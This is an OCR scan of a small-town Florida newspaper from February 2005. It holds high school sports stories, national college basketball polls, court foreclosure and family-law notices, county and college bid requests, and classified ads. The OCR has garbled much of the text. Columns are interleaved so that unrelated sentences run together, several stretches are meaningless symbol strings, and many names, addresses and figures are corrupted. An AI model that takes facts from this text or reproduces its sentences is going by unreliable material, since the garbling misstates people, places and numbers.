at LA Lakers, 10:30 p.m. Dallas at Golden State, 10:30 p.m. LCCC Johns River Community gia 9-8. Kristin Oldham started Continued from page 1B College 7-5. Kalie Ellis was the and Kopperson took the loss winning pitcher., in relief. Ellis also pitched. Andrea Gonzalez and Gonzalez had a three-run dou- Kopperson. Lauren Beidiger were both ble and Beidiger was 3-for-4. The Lady Timberwolves 2-for-3. "The team is starting to play bounced back to beat Mid- Lake City .lost 'to eventual much better," coach B.J. Florida Conference foe St. tournament champion Geor- Hodges said. HOOPS clicked as a team on defense," distributor and primary ball- Continued from page 1B Moore said. "We score points, handler on the team. but if we can just get the Pinello was the Indians' defense to click who knows leading rebounder during the they were down here. The how far we can go?" season, and at 6-foot-2, he is game wasn't decided until the On offense, the Indians rely the tallest player on the roster. last two minutes. And we on Antwan Ruise and Joey Moore has also gotten solid missed free throws at the end, Pinello, their top two scoring contributions from his role and they made their free threats this season. players. throws." "Antwan came on late "Matt Acosta and Jeremy In the last meeting, the because of eligibility, but he Harrell gave us a lift coming Tornadoes' Paris Ruise scored and Joey have really clicked off the bench this season," 49 points on 20-31 from the together as a unit," Moore Moore said. He also cited jun- field, said. "And the other .guys ior varsity call-ups Robert For the Indians to win, they seem to be working together Jammer and Justin Pinello for will have to play solid defense also. Offfensively, we seem to giving the team "a lot of posi- and limit their turnovers, be playing team ball. We're tive minutes." which has been the bane of sharing the ball." The Indians were 8-16 (1-9 their season, Owen McFadden will also in District 4-3A) during the "We still haven't really be a key player as the main regular season. CHS Continuedfrom page 1B "Hopefully, we will go into it knowing it is a new season and we won't look past anyone. "Paxon can play loose and free. They have nothing to lose. Tli- pressure is on us. We have to play with confi- dence, and we should be OK." It took overtime for Columbia to beat Paxon, 72-69, in Lake City in mid-January. The Tigers won 52-45 in Jacksonville two weeks later, and had control of the game for all of the fourth quarter. "In the first one, we played man pretty much the entire game," Hosford said. "We pressed a lot and they got a lot of easy baskets. The shot 65 percent (32 for 49). The second game, we went zone from the second possession and they shot 13 for 36. We will probably show a lot of zone Wednesday." Zone is about all Columbia sees from district opponents and Hosford expects Paxon to pack it in. "The thing about going against a zone is you can't set- tle for 3-pointers," Hosford said. "Most teams playing a zone want you to take that early 3. I would much rather take the ball inside and get an inside-out passing game going. You not only want to go inside, but to the high post. That is the most dangerous spot against a zone." Hosford said Columbia cen- ter Antwan Julks has stepped up his play and is good at find- ing an open shooter. For the last six games, Julks has aver- aged 10.5 points per game and 8.2 rebounds. "I feel like our guards can go head to head with anybody in the district and, with a scor- ing presence inside, it causes Croft places fourth in state weightlifting finals From staff reports Columbia High's Marie Croft earned team points in the Florida High School Athletic Association Girls Weightlifting Finals at DeLand High on Saturday. Croft placed fourth in the 101-pound weight class with a 105 bench press, 120 clean and jerk, and a 225 total. Jenna Payne, who quali- fied in the 110-pound weight class, finished in a tie for 10th. Payne lifted 100-130- 230. Spruce Creek High LM. * mm LM C L. crushed the competition, scoring 47 team points. Oviedo High and Lakewood Ranch High tied for second with 13 points. 'They both had a rough start, only getting their first attempt on the bench press,"' coach Kent Maugeri said. "I'm not sure if they were too nervous due to the fact it was their first time lifting at a state championship. They didn't let the bench press affect them for the clean and jerk. 'They both did well and I am very proud of them." $ 0 0 *0 a) U U - *0 C,) C') zl .5 m I-O 0) E E 0 E 0 LM 4- *) n JS /r I/ teams problems guarding up," Hosford said. "We have also out-rebounded six of our last seven opponents." Hosford said guard Kenneth Williams is also play- ing well. At the team's Free Throw Shoot-around fund-rais- er, Williams made 477 of 500 (95 percent), including his last 100 in a row. "Kenny doesn't make a lot of mistakes on offense or defense," Hosford said. "In his last seven games, he is averag- ing over 10 points and has two turnovers, and that is playing 20-25 minutes per game." Among the starters, Kendric Williams leads the Tigers at 13.6 points per game and he is averaging 4.2 rebounds. Alvin Bradley is. averaging 10.7/6.2; Byron Shemwell's numbers are 8.1/3.3; Justin Rayford aver- ages are 5.4/3.5. Overall, Julks is 5.8/5.5. POLLS AP Top 25 The top 25 teams in The Associated Press' men's college basketball poll, with first-place votes in parentheses, records through Feb. 13, total points and last week's ranking: Record Pts Pvs 1. Illinois (72) 25-0 1,800 1 2. Kansas 20-1 1,710 3 3. Kentucky 19-2 1,592 5 4. North Carolina 20-3 1,576 2 5. Wake Forest 21-3 1,553 6 6. Boston College 20-1 1,365 4 7. Duke 18-3 1,348 7 8. Oklahoma St. 19-3 1,329 10 9. Syracuse 22-3 1,219 8 10. Arizona 21-4 1,140 12 11. Michigan St. 17-4 1,008 13 12. Louisville 21-4 965 9 13. Gonzaga 19-4 889 14 14. Utah 21-3 827 15 15. Washington 20-4 811 11 .16. Alabama 19-4 737 17 17. Pittsburgh 17-4 717 18- 18. Connecticut 15-6 602 19 19. Pacific 20-2 360 24 20. Wisconsin 16-6 342 20 21. Oklahoma 17-6 263 16 22. Maryland 15-7 231 - 23. Charlotte 17-4 225 - 24. Cincinnati 18-6 130 21 25. Villanova 14-6 118 22 Others receiving votes: Florida 105, Georgetown 48, Texas 46, Texas Tech 46, DePaul 45, Old Dominion 44, Mississippi St 33, Nevada 29, Notre Dame 28, Georgia Tech 27, S. Illinois 21, Wichita St. 21, Vermont 19, Memphis 7, Wis.-Milwaukee 7, Miami 6, George Washington 5, St. Mary's, Cal. 2, Texas A&M 2, Holy Cross 1, Minnesota 1. Top 25 schedule Today's Games No. 3 Kentucky at South Carolina, 9 p.m. No. 5 Wake Forest at Miami, 7 p.m. No. 18 Connecticut at Providence, 7p.m. No. 25 Villanova vs. Bucknell, 7:30 p.m. Wednesday's Games No. 1 Illinois at Penn State, 8 p.m. No. 4 North Carolina vs. Virginia, 7 p.m. No. 6 Boston College vs. Rutgers, 7:30 p.m. No. 11 Michigan State vs. Minnesota, S 7p.m. No. 16 Alabama vs. Arkansas, 8 p.m. No. 19 Pacific vs. UC Santa Barbara, 10p.m. 4 No. 20 Wisconsin vs. Michigan, 9 p.m. No. 21 Oklahoma vs. Nebraska, 8 p.m. No. 22 Maryland at NC State, 9 p.m. No. 23 Charlotte vs. DePaul,.p.m. No. 18 Connecticut at Rutgers, 6 p.m. No. 19 Pacific vs. Texas-El Paso, Mid. No. 21 Oklahoma at Kansas State, 1:30 p.m. S No. 22 Maryland at Virginia, 3:30 p.m. No. 23 Charlotte at Tulane, 8 p.m. No. 24 Cincinnati vs. Alabama- Birmingham, 4 p.m. USA Today/ESPN poll The top 25 teams in the USA Today- ESPN men's college basketball poll: Record Pts Pvs 1. Illinois (31) 25-0 775 1 2. Kansas 20-1 735 3 3. Kentucky 19-2 681 5 4. North Carolina 20-3 671 2 5. Wake Forest 21-3 669 6 6. Boston College 20-1 604 4 7. Oklahoma State 19-3 584 10 8. Duke 18-3 541 8 9. Syracuse 22-3 536 7 10. Michigan State 17-4 482 12 11. Arizona 21-4 477 13 12. Louisville 21-4 426 9 13. Washington 20-4 365 11 13. Utah 21-3 365 15 15. Pittsburgh 17-4 352 15 16. Gonzaga 19-4 297 17 17. Alabama 19-4 284 19 18. Connecticut 15-6 265 14 19. Pacific 20-2 191 24 20. Wisconsin 16-6 138 21 21. Cincinnati 18-6 103 20 22. Oklahoma 17-6 92 18 23. Charlotte 17-4 69 - 24. Florida 15-6 59 - 25. Texas Tech 15-6 49 23 Others receiving votes: Maryland 48; Texas 40; DePaul 34; Wichita State 20; Villanova 19; Georgetown 16; Old Dominion 15; Southern Illinois 15; UAB 12; Notre Dame 8; Mississippi State 7; Nevada 7; George Washington 6; Georgia Tech 4; Oregon State 4; Air Force 3; Iowa State 2; Miami (Ohio) 2; Western Kentucky 2; Vermont 1. of Gas with I ree Maj or Rep El 1W I- 12/1 Nationwide Warr i El 4 LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 3B >1 e^3 -dm - I u~ft I -- a -4 4 4- -.: q= 4lo- w bpp404 ~ ,.,- - do *.4 r *MOM e w two 74ip 1ow -- "Copyrighted M ^*.Syndicated Co ^Available from Commercial VjAM t n01 GNO I A,- - . material intent 5, 4'a Ai News Providers", 1" I : U N , - m 0,840 *I i i.A 401-400-b a Aodw Um o b d -bw -n ow Ib 4m 40 * 000 * -~ .. * ~ 4 0000 * AM *AM 0 mob ASM - 0 0 0 * 0e S * 401Mas a ~ ~ 4ma. 0- 0 00 0 0.0 as a 5* 0 *'.0 ~ 0 a *m& 4 0*41b. 0100 am o 0 af itam m 0m a w .4 *Me * - * ..- 0 0 tb Ow ~L7 .o 0- 40 4w Q aMe 0 o g * ** * 4b IU and 41b 4000 qD iYaot LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 Legal INVITATION TO BID BID NO. 2005-A SURPLUS PORTABLE BUILDINGS please be advised that Columbia County desires to accept sealed bids on four sur- plus portable buildings. Bids will be ac- cepted through 2:00 P.M. on March 9, 2005. All bids submitted shall be on the form provided. Specifications and bid forms may be ob- tained by contacting the office of the Board of County Commissioners, Co- lumbia County, 135 NE Hernando Street Room 203, Lake City, Florida 32056- 1529 or by calling (386) 758-1005. Co- lumbia County reserves the right to re- ject any/and all bids to accept the bid in the County's best interest. Dated this 16th day of, February 2005. Columbia County Board of County Commissioners Jennifer Flinn Chair Person February 16, 23, 2005 IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT IN AND FOR COLUMBIA COUNTY, FLORI- DA SCIVILACTION CASE NO. 2004-526-CA DIVISION MATRIX FINANCIAL SERVICES CORPORATION, Plaintiff JORGE L. GUERRA, et al, Defendantss). NOTICE OF FORECLOSURE SALE NOTICE IS HEREBY GIVEN pursuant to a Final Judgment of Mortgage Fore- closure dated February 08, 2005 and en- tered in Case NO. 2004-526-CA of the Circuit Court of the THIRD Judicial Cir- cuit in and for COLUMBIA County, Florida wherein MATRIX FINANCIAL SERVICES CORPORATION is the Plaintiff and JORGE L. GUERRA; KENDILYN S. GUERRA; CITIFINAN- CIAL EQUITY SERVICES, INC.; TENANT #1 N/K/A CHARLENE COU- CHAN are the Defendants, I will sell to the highest and best bidder for cash at FRONT STEPS OF THE COLUMBIA COUNTY COURTHOUSE at 11:00 AM, on the 9th day of March, 2005, the following described property as set4forth in said Final Judgment: LOT 13, PINE HAVEN, ACCORDING TO. THE PLAT THEREOF, AS RE- CORDED IN PLAT BOOK 6, PAGES 138 THROUGH 139, OF THE PUBLIC RECORDS OF COLUMBIA COUNTY, FLORIDA. TOGETHER WITH A MOBILE HOME LOCATED THEREON AS A RERMA- NENT FIXTURE AND APPURTE- NANCE THERETO. A/K/A Rural Route 27 Box 248013, Lake City, FL 32024 WITNESS MY HAND and the seal of this Court on February 9th, 2005. P. DEWITT CASON Clerk of the Circuit Court by:-s- J. MARKHAM Deputy Clerk 01550887 February, 15, 22, 2005 IN THE CIRCUIT COURT OF THE, THIRD JUDICIAL CIRCUIT, IN AND FOR COLUMBIA COUNTY, FLORI- DA Case No: 05-40-DR Division: JUSTINE NICOLE SLOCUM, Pentioner ' tri, \\ILLIAM .iOSEPH PATTON . Respondent. NOTICE OF ACTION FOR DISSOLU- TION OF MARRLAGE TO \ ILLLAM IOSEPH P-TTOON 4115 Alpine Dr. Gainesville, FL YOU ARE NOTIFIED that an action has been filed against you and that you are required to serve a copy of your written defenses, if any, to it on JUSTINE NIC- OLE SLOCLrM whose address is 816 N\V ["th \Ve. Gainesville,,FL 32609, on or before 2/20/05, and file'the origi- nal vih the clerk ,:,t this Court at P.O. Box _2069. Like Cirt. FL 32056 before service on Petitioner ori immediately thereafter. If you fail to do so, a default may be entered against you for the relief demanded in the petition, Copies of all court documents in this' case, including orders, are available at. the Clerk of Circuit Court's office. You, may review these documents upon re- quest. You must keep the Clerk of the Circuit Court's office notified of your current address. (You may file Notice of Cur- rent; Dated January 20, 2005 P. DEWITT CASON CLERK OF THE CIRCUIT COURT . by:-s- MARIA BONESIO Deputy Clerk I Paula Huber, a nonlawyer, located at 24602 NW 122 Ave. Alachua, FL 32615, 386-454-2378 helped JUSTINE NICOLE SLOCUM who is the peti- tioner, fill out this form. 01550253 January 25, 2005 February 1, 8, 15, 2005 IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT, IN AND FOR COLUMBIA COUNTY, FLORI- DA CASE NO.: 03-595-CA GREEN TREE SERVICING, LLC f/k/a 'GREEN TREE FINANCIAL SERVIC- ING CORP. 4625 River Green Parkway Duluth, GA 30096 Plaintiff, v. WILL E. CRAY, Defendant. NOTICE OF SALE NOTICE IS HEREBY GIVEN THAT, pursuant to Plaintiff's Final Judgment Of Foreclosure and Re-Establishment of Note entered in the above-captioned ac- tion, I will sell the property situated in Columbia County, Florida, described as .follows, to wit: Lot 19, Pine Ridge according to the map or plat thereof as recorded in Plat Book 4, Pages 102 and 102 A, Public Records of Columbia County, Florida. TOGETHER WITH that certain 1997 48 x 24 Springhill Mobile Home: VIN #GAFLV34A/B70324-SH21 at public sale, to the highest and best bidder, for cash at the Columbia County Courthouse, Lake City, Florida, at 11:00 a.m., on the 9th day of March, 2005 Clerk of the Circuit Court By: J. Markham J. MARKHAM Deputy Clerk 03524110 February, 15, 22, 2005 Legal IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT, IN AND FOR COLUMBIA COUNTY, FLORI- DA. Case No: 05-071 DR Division: MARILYN MARIE FAVORITE Petitioner, ALAIN CARL LEBRUN Respondent. NOTICE OF ACTION FOR PETITION FOR NAME CHANGE MINOR CHILDREN) TO: ALAIN CARL LEBRUN HOLLYWOOD, FLORIDA YOU ARE NOTIFIED that an action has been filed against you and that you are required to serve a copy of your written defenses if any, to it on MARILYN MARIE FAVORITO whose address is 3112 SW HERLONG ST. FT. WHITE, FL 32038 on or before MARCH 4, 2005, and file the original with the Clerk of' this Court at 173 Supremel Court Ap-. P. DEWITT CASON Clerk of the Circuit Court by:-s- MARIA BONESIO Deputy Clerk 01550730 February 8, 15, 22,2005 March 1, 2005 IN THE CIRCUIT COURT OF TI THIRD JUDICIAL CIRCUIT, IN A' FOR COLUMBIA COUNTY, FLOOR DA CASE NO.: 05-08-CA GREEN TREE SERVICING, LLC f/k/ GREEN TREE FINANCIAL SERVI ING CORP. 1400 Turbine Drive Rapid City, SD 57703 Plaintiff, v. WILLIE R. BARNER; DEBORA BARNER; and STATE EMPLOYEES CRED UNION, Defendants. NOTICE OF ACTION TO: WILLIE R. BARNER DEBORAH BARNER YOU ARE NOTIFIED that a foreclosu action has been filed against you on t following described property: Lot 1, Block C, NEW HOPE ESTATE UNIT 2, a subdivision according to th plat thereof recorded in Plat Book Page 93, Public Records of Columb County, Florida. TOGETHER WITH that certain 1996 \ 2s Dnast' Mlobile Home. Serial N SHSI02S-4GL&R and you are required t:. file a .miten r sponse with the Court and serve a cop of your rrten defenr:e, ifany,'tbo it i Timothy D. Padgett, Plaintiff's attome whose address is 2810 Remington Gree Circle, Tallahassee, FL 32308, at lea thirty (30) days from the date of fir publication or on or before March 2 2005, and file the original with the cle: of this court either before service o Plaintiff's attorney or immediately their after; otherwise, a default will be entered against you for the relief demanded the complaint. Dated this 9th day of February, 2005. CLERK OF COURT By: -s- J. Markham J. MARKHAM Deputy Clerk. 01550894 February 15,22, 2005 Registration of Fictitious Names We the undersigned, being duly swor do hereby declare under oath that th names of all persons interested in th business or profession carried on undi the name of: The Appraisal' Store at 490 NW Sprin Hollow Blvd., Lake City, FL 32055. Contact Phone Number: 386-752-321 and the extent of the interest of each a follows: NAME: Douglas G. Vodnansky EXTENT OF INTEREST: 100%. by: -s- Douglas G. Vodnansky STATE OF FLORIDA COUNTY 0 COLUMBIA Sworn to and subscribed before me th: 10th day of February, A.D. 2005 by:,; -s- Kathleen A. Riotto Notary 03524105 February 15. 2005 P- U'' . 16 Ajh HE ID RI- a C- IH Irr Legal IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT IN AND FOR COLUMBIA COUNTY, FLORI- DA CASE NO: 05-06-CA MORTGAGE ELECTRONIC REGIS- TRATION SYSTEMS, INC., a Nominee for Novastar Mortgage, Inc., Plaintiff, vs. KURT STEPHEN CONKLIN a/k/a KURT S. CONKLIN, UNKNOWN SPOUSE OF KURT STEPHEN CON- KLIN a/k/a KURT S. CONKLIN, MORTGAGE ELECTRONIC REGIS- TRATION SYSTEMS, INC. (MIN 100080100010661790), STATE OF FLORIDA DEPARTMENT OF .REVE- NUE, YVONNE M. PEISEL-GALLE- GOS, UNKNOWN TENANTS) IN POSSESSION #1 and #2,,et. al., Defendant(s). NOTICE OF ACTION TO: YVONNE M. PEISEL-GALLE- GOST last known residence: RR 13, Box 2064, Lake City, FL 32055 or 1817 SE Beadie Drive, Lake City, FL 32025, current res- idence unknown, if living, and ALL OTHER UNKNOWN PARTIES, includ- ing, if a named Defendant is deceased, the person representatives, the* surviving spouse, heirs, devisees, grantees, cred- itors, and all other parties claiming, by, through, under or against that Defendant, and all claimants, persons or parties, nat- ural or corporate, or whose exact legal status is unknown, claiming under any of the above named or described Defend- ants. . YOU ARE HEREBY NOTIFIED that an action to foreclosure a mortgage on the following property located, in Columbia County Florida: LOT 16, SPRINGFIELD ESTATES, PHASE 2, A SUBDIVISION, AC- CORDING TO THE PLAT THEREOF AS RECORDED IN PLAT BOOK 6, PAGE 27, OF THE PUBLIC RE- CORDS OF COLUMBIA COUNTY, FLORIDA. has been filed against you and .your are required to serve a c.,p o of '.our written defenses, if any, to ii on Brian L. Rosal- er, Esquire, Popkii & Rosaler, P.A., Plaintiff's attorney, at 10 Fairway Drive, Suite 302, Deerfield Beach, FL 33441, within 30 days of the first date of publi- cation of this notice, and file the original with the clerk of this court (P.O. Box 2069, Lake City, FL 32056) either be- fore March 21, 2005 on Plaintiff's attor- ney' or immediately thereafter; otherwise a default will be entered against you for the relief demanded in the complaint or petition. Date onkFebruary 9, 2005. P. DEWITT CASON As Clerk of the Court By:-s- J. Markham" ' J. MARKHAM As Deputy Clerk 03524108 February 15, 22, 2005 REQUEST FOR QUALIFICATIONS ire FOR ARCHITECTURAL SERVICES he RFQ#: LCCC 3-001-05 The Board of Trustees of Lake City S, Community College (LCCC), Lake City,' he Florida, 32025, in compliance with Sec- 5, tion 287.055, Florida Statutes, and State nia Requirements for Educational Facilities (SREF), is accepting applications from 72 architectural firms to provide services o. necessary to complete various LCCC" prjectiiacti itie. Listed bclo., are rep. e- resenlamie prioect'/,Il(u luesIe for hirch py the selected firrr, man, be required to pro. on ,.i, .. tchell c'jJI ,e ,... ..r,3',. He 'i i.' ;y, criteria package as specified by Section en 287.055 F.S. ast 1. Develop a strategic, long range Facili- rst ties Master Plan. 1, 2. Architectural and Engineering serv-' rk ices for renovation of buildings Is, and on #21 e- 3. Facilities Program Management Serv- 6d ices. in 4. Five-Year Educational Plant Survey. All parties interested in being considered for providing the described services nma\ request an Archiiectural Services Re- sponse package from: Bill Brown Director of Purchasing Lake Cnir Commrunir CCollege 149 SE CoLlegePlace Lake City, Florida 32025 (386) 754-4360 Response packages may also be obtained m via e-mail by sending a request to: Sbrownb@lakecitycc.edu he Five (5) copies of the Response package, ie of which at least one (1) copy will have er the original signature, must be received in the Purchasing Office located in Room 138, Building 001 on the Main Ig Campus of Lake City Community Col- lege no later than 2:00 PM, March 7, 2005. Responses received after that time will not be considered for this RFQ. Re- as sponses via facsimile, email or any other media will not be accepted. , On March 15, 2005 a committee com- prised of Lake Cni\ Community College personnel and/or consultants will meet in Building 001, Room 144 to evaluate the responses. The' RFP opening activity and the RFP F evaluation meeting is open to the public. Any person requiring special accommo- dations for these meetings should imme- diately notify the Director of iS Purchasing/Fiscal Reports at (386) 754-, 4360. Lake City Communiry College Board of Trustees Charles W. Hall, President 01550897 February 13, 15, 16, 2005 RUP pm -ww RE 0* b *'f-a wO41 RER Sdial-a-pro Reporter Service Directoty Classified -= ^ -- furniture DOUBLE OAK Rocker $100 386-752-9500 FREE CLEANUP. Pick up of unwanted metals, tin, scrap vehicles. 386-755-0133 We Recycle., Land Services Legal Public Auction 1995 Dodge VIN 1B7FL26X1SW924254 1999 Ford VIN 1FMRUl7LOXLC11088 To be held at: Jim's Auto Service LLC 2',5SWMaiinBld Lak:. Ct, FI 320'25 A't'. ',-",.- ',1-" 'Date of Sale: Wednesday, 2005 Time of Sale: 10:00 AM 01550739 February 14, 2005 - March 02, op" * v E[ Personal Merchandise 4 line minimum .. .'2.55 per line a. Add an additional $1.00 per ad for each Wednesday insertion. ,,,. ,, Number of Insertions Per line Rate 43 ................... ...... 1.65 4-6 ........ ....... ...... 1.50 7-13......................'1.45 I I 14-23..:................... 1.20 4 o2r5 24 or mora............. 99 I' Add nan additionals$1.00 per ad for each Wednesday insertion SLimited to service type advertising only. S4 lines, one month ..............'60.00 2 5 0 o $9.50 each additional line Add an additional$1.00 perad for each ,n% d i,' ,crn $[q O0 Ad Errors- Please read your ad on the first' 0 day of publication. We accept responsibility for only the first incorrect Insertion, and S only the charge for the ad space in error. Please call 755-5440 immediately for prompt Correction and billing adjustments., Cancellations- Normal advertising deadlines .t~ttSAit nnil W-,.,----.- ecnacrofylppa n. You can call us at 755-5440, Monday through Friday from 8:00 a.m. to 5:00 p.m. Some people prefer to place Ihe am. Thurs., 10:00 a.m. Fri., 10:00 a.m. Fri., 10:00 a.m. Fax/Email by: Mon., 9:00 a.m. Mon, 9:00 am. Wed., 9:00 a.m. Thurs., 9:00 a.m. Fri., 0 I e' eCo u r Federal, State or local laws regarding the prohibition SBiIng Inquiries- Call 755-540. Should fur- of discrimination in employment, housing and public '1 2 a,,ir,. -r information be required regarding pay- accommodations. Standard abbreviations are accept- S" i ts or credit limits, your call will be trans- able; however, the first word of each ad may not be ,'t. i ed tothe accountingdepartment. abbreviated. $ No PdrUng sIgns WIhIEd-A iptuarg $, On r' 9 ra I ] In Print and On Line ( Homes -Acreage Commercial S..... VAL IR AF %ttio.itRuliM g *j North Flo rid-4' 11 j CL a am .06 .L0 0L. 40 v Yvv A SAA Sao] * *w soap - * 00 a LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 Legal IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT OF FLORIDA, IN AND FOR COLUMBIA COUNTY CIVIL DIVISION CASE NO.: 04-516-CA FIRST NATIONAL ACCEPTANCE COMPANY Plaintiff, vs. JEFFREY D. SHELTON AND LORA LYNN SHELTON, DEANNA K. JOHNSON, TRUSTEE OF THE DEANNA K. JOHNSON TRUST, and UNKNOWN TENANTS/OWN- ERS, Defendants. NOTICE OF SALE Notice is hereby given, pursuant to Final Judgment of, Foreclosure for Plaintiff en- tered in this cause on February 2, 2005, in the Circuit Court of Columbia Coun- ty, Florida, I will sell the property situat- ed in Columbia County, Florida descri- bed as: A PART OF THE SE 1/4 OF THE SE 1/4 OF SECTION 10, TOWNSHIP 7 SOUTH, RANGE 17 EAST, BEING MORE PARTICULARLY DESCRI- BED AS FOLLOWS: BEGIN AT THE NORTHEAST CORNER OF THE SE 1/4 F THE SE 1/4 OF SAID SECTION 10 AND RUN SOUTH 2 40' 08" EAST ALONG THE EAST LINE OF SAID SECTION 10, 717.02 FEET; THENCE SOUTH 880 23' 50" WEST, 200.00 FEET; THENCE NORTH- WESTERLY ALONG THE ARC OF A CURVE TO THE LEFT HAVING A RADIUS OF 50.00 FEET. AND IN- CLUDED ANGLE OF 143- 07' 48" FOR AN ARC DISTANCE OF 124,90 FEET; THENCE SOUTH 88 23' 50" WEST, 23.48 FEET; THENCE NORTH 20 40' 08" WEST 687.02 FEET TO THE NORTH LINE OF SAID SE 1/4 OF THE SE 1/4 OF THE SE 1/4; THENCE NORTH 880 23' 50" EAST 312.92 FEET TO THE POINT OF BE- GINNING. ALSO KNOWN AS: LOT 15, DOWNING ACRES, AN UNRE- CORDED SUBDIVISION and commonly known as: 819 S.E.. Downing Drive, at public sale, to the highest arid best bidder, for cash, AT THE FRONT DOOR OF THE COLUM- BIA COUNTY COURTHOUSE, 145 N. HERNANDO STREET, LAKE CITY, FLORIDA, on March 2, 2005 at 11 o'clock P.M., Dated this 3rd day of Feb- ruary, 2005., P. DEWrIT CASON Clerk of the Circuit Court By: -s- J. Markham J. MARKHAM Depu, Clerk 01 55Isy95 .February 15, 22, 2005 In naniion 1o Bid Meadors Construction Company, Inc. in- vites all NMBE/\\BE Subcontractors to bid the following: Lake : City Water Treatment Plant Project. Work consists of excavation, grading, grassing, concrete finishing, rebar, masonry, fencing, mechanical, instru- mentation and electrical. Please submit your bid in written form on or before February 17th, 2005;'to Meadors , Construction Co., Inc. at 5634-1 W. 5th Street, Jacksonville, FL. 32254, Estimating Dept; Ph. 904-695-9290 or --PFaxF 904-695-9272. Plans and Specs may be viewed at the address above or any plar .,i. **n .I .s" ir.., iA'iL __ S Co.. Inc is an EOE SUlirt Contractor, License n LM00.'317: 01550869 February 11, 12, 13, 15, 16, 2005 NOTICE OF SHERIFF'S SALE NOTICE IS HEREBY GIVEN that pur- suant to a Writ of Execution issued in the County Court of Columbia Count.. Florida, on the 26th day of May 200-1, in the cause 'wherein Worldwide Asset Management, L.L.C. assigned to Bank Of America, as Plaintiff, and Walter D. Labbi as Derendant. being case Anumber 02-925-SP, in .aid Coun . I Bill Gootee. as Sheriff of Columbia Courity, Floridj hae le'. ied Lpon all the right, title and nieresi oi the Defendant, Waller D Labbi. in and 0o the following S described Real Propert). to-, ii All blocks G & H of Oak%\ood S/D & all that piece or- parcel of land lying be- tween blocks G & H of Oakwood S/D. 3575 Highway 441 South/Ri. 10 Box 289. And on the 21st day of March 2005, at the Columbia County Courthouse, 173 N.E. Hemando Avenue. Lake Cir'. Flor- ida at the hour of li-003a.m. or soon thereafter as possible. I will offer for sale all of the said defendant Walter D. Lab- bi's right, title and ineresi m the afore- said Real Properry .at public auction and will sell the same subjectt 10o laes. all prior liens. encoumrances and judg- ments, if an.\. 10 io e highest bidder for cash. The proceeds to be applied to the payment of costs and satisfaction of the Above execution. ..: , BILL GOOTEE, SHERIFF . OF COLUMBIA COUNTY. FLORIDA By: Sergeant Jeff Coleman In accordance ,ith the Americans ithh Disabilities Act. persons needing special accommodation. to parnicpale in these proceedings should contact the agency sending this notice, no later than se'en days prior the proceedings at 173 N.E. Hemando Avenue, Lake City, FL 32055. Telephone (386) 758-1109. 01550906 February 15, 22, 2005 March 1, 08, 2005 REQUEST FOR PROPOSAL FOR BANKING SERVICES RFP#: LCCC 02-001-05 The District Board of Trustees of Lake City Community, College invites finan- cial institutions that are qualified public depoiioriere a, defined in Chapter 280, Florida Statute and uho ha e a main or full ,ermice branch office ph'sicatl\ lc,- cdiaed iithin 15 mile: of the Lake CirN Communroi College campus to pro% ide a proposal for those banking services specified in the Banking Service Propos- alpackage. All financial institutions interested in be- ing considered for providing banking services for the College may request a Banking Services Proposal package from: Bill Brown / Director of Purchasing Lake City Community College 149 S.E. College Place Lake City, Florida 32025 . S(386) 754-4360 " Proposal package ma\ al'o be obtained '.ia e-miil b., 'ending a request to: bronbii'laket:)cc edu Five (5) copies of the Response package, of which at least one (11 copy will have the original signature. must be received in the Purchasing Office located in , Room 138, Building 001 on the Main Campus of Lake City Community Col- lege no later than 2:00 PM, March 10, 2005. Responses received after that time will not be considered for this RFP. Re- sponses via facsimile, email or an\ other media will not be accepted. ,I. I On March 17, 2005 an evaluation com- mittee comprised of Lake City Comn- Legal munity College personnel will meet in Building 001, Room 101 to evaluate the responses. The public is invited to attend the RFP opening activity and the committee eval- uation meeting. Any person requiring special accommodations for this meeting should immediately notify the Director of Purchasing at (386) 754-4360. Lake City Community College Board of Trustees Charles W. Hall, President 01550912 February 13, 15, 16, 2005 020 Lost & Found FOUND ADULT pet rabbit. Call to identify. 386-752-3764 FOUND RING Winn Dixie Lake City 386-623-5952 LOST CAT neutered male,, domestic med. hair, gray tabby, Missing since 1/10, around 245 A area. AVID micro-chip. Loved & Missed please call 386-365-3449 Lost small brown Poodle. "Sparky". Hwy 47 area. 386-755-1893 WWII Vet Lost cane downtown. stag handle, carved snake. 755-7284 *CHILD CARE WORKER* M/Fhrs. 6am-6pm Call 752-4411 or fax qualifications to: 752-0740 Must have clean background check. 550107 NEED A JOB? Get a real estate license. Call 755-40410 for infto or reach us @ N.FL Real Esiate -ind i iin Equal Opponrunit' Emplo.er. 01550599 THE LAKE CITY REPORTER is currently looking for an independent newspaper carrier for the Downtown Lake City area. Deliver the Reporter in the early morning hours Tuesday Sunday. No delivery on Monday's. Carrier must have dependable transportation. Stop by the Reporter today to fill out a contractor's inquirers form. No phone call-! 100 Opportunities 01550710 SOUTHEAST REGIONAL DRIVERS Davis Express, Starke, FI is looking for drivers to run SE. Requires Class A CDL w/hazmat. 98% miles in Fla., Ga., TN., S.C., & Alabama. 0 1 yr. exp. .34 cpm 0 2 yrs. exp. .35 cpm @ 3 yrs. exp. .36 cpm 100% lumber reimbursement 0 $500 sign on bonus Safety bonus Guaranteed hometime Health, Life, Dental & disability Ins avail. 401K available. Call 1-800-874-4270 #6 01550809 PAYROLL ADMINISTRATOR, Challenging position with the largest sail boat manufacturer in the USA. Immediate Opening for a person with at least 2 years experience with a computerized payroll system. Experience with Excel a must. Other program knowledge include Crystal Reports, Abra, and Unitime. Employer offers an excellent. fringe benefit package, including family health care, paid vacations and paid holidays, and a 401K Plan. Salary is negotiable with experience. Please apply in person at Hunter Marine, Hwy 441 in Alachua. 01550862 IMMEDIATE OPENING in the Production/Editorial departments. Candidates must be detail oriented and have experience in Quark Xpress, Ploto Shop, and using Macintosh computers. Good i) ping skills a plus. Experience in Acrobat and Acrobat Distiller also helpful. Regular shift will be, Tues. Sat., 3 p.m. 12 midnight. Competiitie hourly rate. Candidates, are asked to send all resumes to Dave Kimler, c/o Lake City Reporter, 180 E. DuvalSt., Lake City, FL 32055 or email to: dkimler@lakecityreporter.com. If samples of work are available, please include with submitted, resume. Only qualified candidates will be called for interview.,. SFull'Hefalth Insurahi 